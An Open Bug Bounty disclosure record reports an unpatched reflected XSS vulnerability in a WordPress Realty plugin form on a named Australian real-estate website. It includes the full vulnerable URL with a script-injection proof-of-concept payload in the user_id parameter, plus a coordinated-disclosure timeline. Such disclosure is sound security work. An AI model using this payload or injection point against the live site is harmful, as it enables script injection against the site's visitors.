Vulnerable URL:
http://www.lynham.com.au/wp-content/plugins/Realty/display/elements/form_contact_agent.php?user_id=%22%3C/script%3E%3Cscript%3Ealert%28/OPENBUGBOUNTY/%29%3C/script%3E%27&popup;=1
Details:
Description |
Value |
Patched: |
No |
Latest check for patch: |
26.07.2017 |
Vulnerability type: |
XSS |
Vulnerability status: |
Publicly disclosed |
Alexa Rank |
22255631 |
VIP website status: |
No |
Check lynham.com.au SSL connection: |
(Grade: F) |
Coordinated Disclosure Timeline:
Description |
Value |
Vulnerability submitted via Open Bug Bounty |
7 May, 2016 15:51 GMT |
Generic security notifications sent to website owner |
7 May, 2016 15:54 GMT |
Customized security notification sent to website owner |
7 May, 2016 15:54 GMT |
Notification sent to subscribers (without technical details) |
7 May, 2016 18:17 GMT |
Vulnerability details disclosed by researcher |
30 July, 2016 16:12 GMT |